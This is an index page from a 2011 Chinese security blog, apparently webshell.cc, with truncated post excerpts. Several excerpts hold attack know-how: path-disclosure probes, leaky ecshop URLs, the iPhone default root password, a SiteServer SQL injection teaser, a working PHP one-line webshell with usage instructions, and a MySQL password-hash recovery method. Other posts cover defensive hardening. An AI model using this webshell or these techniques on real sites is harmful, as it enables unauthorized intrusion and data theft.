PHP爆绝对路径方法总结帖

分类:安全 | 2011-10-29 | 撸过 1,572 次
0人扯谈

1、单引号爆路径

说明:

直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。

Eg:

http://www.webshell.cc/news.php?id=149'

截图:

 

 

2、错误参数值爆路径

说明:

将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。

Eg:

https://www.webshell.cc/researcharchive.php?id=-1

截图:

 

 

3、Google搜路径

说明:

结合关键字和site语法搜索出错页面的网页快照[......]

继续阅读

ecshop的48个泄露网站路径漏洞

分类:安全 | 2011-10-27 | 撸过 559 次
0人扯谈

http://www.webshell.cc/shop/api/cron.php
https://www.webshell.cc/shop/wap/goods.php
https://www.webshell.cc/shop/temp/compiled/ur_here.lbi.php
https://www.webshell.cc/shop/temp/compiled/pages.lbi.php
https://www.webshell.cc/shop/temp/compiled/user_transaction.dwt.php
https://www.webshell.cc/shop/temp/com[......]

继续阅读

默认口令可能导致 iPhone 用户信息泄露

分类:安全 | 2011-10-27 | 撸过 408 次
0人扯谈

 iPhone 的root默认口令已经不是秘密,随便GOOGLE一下就可以知道Root和mobile帐号密码就是:alpine

国内绝大多数用户购买了IPHONE后,第一时间就是贴膜,接着就是越狱了吧,越狱是为了能使用更多的应用程序、游戏、娱乐等等功能。
有一些应用程序如果需要使用,前提就要安装一些资源包,可以使用IPHONE里的CYDIA下载安装。
比如用户需要在IPHONE使用命令行,或其他相关程序,都需要OPNESSH支持,当OPENSSH安装后,会开启22端口。
如果此时,用户没修改 alpine 默认密码,又使用WIFI上网的话,就会有资料泄露的风险。

下面是我用自己WIFI内网[......]

继续阅读

SiteServer 3.4.4最新SQL注入0day

分类:安全 | 2011-10-27 | 撸过 387 次
0人扯谈

这几天在看一个站的时候发现了这个CMS,网上公布了一些漏洞,没说明具体版本,

但在我在3.4.4上实际测试的时候发现是无效的,为此专门去官网下了一份最新版,

看了一下,发现了一些很搞笑的问题。简介siteserver:本文测试的版本是:

SiteServer系列产品最新版本: 3.4.4 正式版 (2011年7月18日发布)

下载地址:http://www.siteserver.cn/download客户案例:http://www.siteserver.cn/customer

也百度了一下,发现客户数量还是不少的。

漏洞描述:问题出在UserCenter.Pages.DLL中的Re[......]

继续阅读

php最新变异一句话

分类:安全 | 2011-10-24 | 撸过 774 次
0人扯谈

注释:站长的任务又加重了,好好认识下,以后见了好清除

本来匿名发在土司上,现在应该传出去了,两个是来自国外的

http://h.ackack.net/tiny-php-shell.html

http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/

具体看国外的文章吧

第一种:1.php

<?=($_=@$_GET[2]).@$_($_GET[1])?>

在菜刀里写http://www.92hack.net/1.php?2=assert密码是1

第二种2.php

<?

$_=[......]

继续阅读

MySQL Root密码另类破解

分类:安全 | 2011-10-22 | 撸过 354 次
0人扯谈

当下载mysql的user.MYD数据库连接密码hash值无法用winhex等十六进制编辑器查看时:

停止mysql服务

将下载的user.MYD user.frm user.MYI替换本地文件,

然后 cd mysql\bin mysqld-nt --skip-grant-tables

重新打开一个cmd mysql -u root select user,password from mysql.user;

自己记录下,免得忘记命令

为你的ip加把锁

分类:技术 | 2011-10-20 | 撸过 217 次
0人扯谈

现在很多单位都配置了局域网,为了便于进行网络管理,同时为了提高的登录网络的速度,网管人员一般都为局域网中的每台电脑都指定了IP地址。但是在Windows环境下其他用户很容易修改IP地址配置,这样就很容易造成IP地址冲突等故障,不利于网络的正常管理。
  因此,最好能为IP地址加上一把“锁”,这样别人就不能轻易更改IP地址了。

  在Windows 2000/XP中存在Netcfgx.dll,Netshell.dll和Netman.dll三个动态库文件,它们实际上是系统控件,在Windows 2000/XP的安装过程中会自动注册这些控件。这三个控件和Windows 2000/XP的网络功能紧密[......]

继续阅读

TP-LINK无线路由器防蹭网的方法

分类:技术 | 2011-10-20 | 撸过 459 次
1人扯谈

本文主要以TP-LINK无线路由器为例为大家讲解一下:

首先,要认识蹭网卡“蹭网卡”是一种Wifi无线局域网网卡,和标准的无线网卡相比,主要有以下特点:

1、发射功率大

中国无委会规定天线增益低于10dBi的2.4GHz无线局域网产品等效全向辐射功率(EIRP)必须小于或等于100mW,欧盟CE认证标准也规定2.4GHz无线局域网产品的等效全向辐射功率(EIRP)要小于或等于100mW,所以标准的无线路由器和无线网卡发射功率一般都在50-100mW之间,而“蹭网卡”发射功率一般都在800mW以上,是标准无线产品的十几倍,和手机相当,辐射较强,属于严重超标产品,长时间、近距离使用会影响到人[......]

继续阅读

浅谈PHP可变变量安全

分类:安全 | 2011-10-20 | 撸过 394 次
0人扯谈

本来想写篇长点的文档的,后来想想这个东西已经被各路牛人实战得无比纯熟了,所以我就只简单的说一下这个东西。

记得我刚接触PHP安全的时候,问几位大牛怎么入门,他们总是和我说去看PHP手册吧,安全就是基础。

没错,我要说的东西在PHP手册里就有非常详细的说明:.net/manual/zh/language.variables.variable.php">http://php.net/manual/zh/language.variables.variable.php,所以强烈要求看了手册后再接着往下看!

可变变量是PHP一个非常方便的特性,手册里已经说了,可变变量的意思就是一个变量的变量[......]

继续阅读

自动实时监控Windows2003服务器终端登录

分类:技术 | 2011-10-18 | 撸过 305 次
0人扯谈

朋友一台Windows服务器被黑了,而且还被人恶意删除了一些数据备份,帮其做了下安全加固,考虑到服务器都是通过Windows 终端服务器来管理的,就想办法对其登录做个监控,找了个命令行下发邮件的小工具blat还有批处理,做了个简单的监控程序,功能是当有人通过终端登录且成功后,会向指定的邮箱发送登录者IP地址。

1.先下载blat解压缩到c盘blat目录下面。

2.任意目录新建一个bat文件,我这里是mail.bat,内容如下,

@echo off
date /t >mail.txt
time /t >>mail.txt
netstat -n -p tcp | find "[......]

继续阅读

第 1 页,共 6 页12345...最旧 »